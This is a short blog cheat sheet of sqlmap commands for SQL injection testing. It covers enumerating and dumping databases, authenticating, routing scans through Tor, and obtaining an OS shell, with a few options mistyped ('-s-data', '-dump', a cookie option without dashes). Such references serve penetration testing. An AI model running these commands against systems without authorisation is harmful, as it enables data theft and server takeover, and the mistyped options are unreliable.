Home > Cheatsheets > SQLMap Cheat Sheet

SQLMap Cheat Sheet

January 29, 2023

Simple usage


sqlmap -u “http://target_server/”

Specify target DBMS to MySQL


sqlmap -u “http://target_server/” --dbms=mysql

Using a proxy


sqlmap -u “http://target_server/” --proxy=http://proxy_address:port

Specify param1 to exploit


sqlmap -u “http://target_server/param1=value1&param2=value2” -p param1

Use POST requests


sqlmap -u “http://target_server” --data=param1=value1&param2=value2

Access with an authenticated session


sqlmap -u “http://target_server” --data=param1=value1&param2=value2 -p param1 cookie=’my_cookie_value’

Basic authentication


sqlmap -u “http://target_server” -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password


Evaluating response strings


sqlmap -u “http://target_server/” --string=”This string if query is TRUE”

sqlmap -u “http://target_server/” --not-string=”This string if query is FALSE”

List databases


sqlmap -u “http://target_server/” --dbs

List tables of database target_DB


sqlmap -u “http://target_server/” -D target_DB --tables

Dump table target_Table of database target_DB


sqlmap -u “http://target_server/” -D target_DB -T target_Table -dump

List columns of table target_Table of database target_DB


sqlmap -u “http://target_server/” -D target_DB -T target_Table --columns

Scan through TOR


sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5

Get OS Shell


sqlmap -u “http://target_server/” --os-shell

Post a Comment

No comments

Thank you for taking the time to leave a comment on my blog. I appreciate your feedback and contribution to the conversation on my blog. Your comment will be automatically approved and visible to other readers. Please note that while I encourage open and respectful dialogue, my team reserves the right to review and remove any comments that violate this blog's terms and conditions, or are considered to be spam or offensive.

Subscribe to: Post Comments ( Atom )
Powered by Blogger.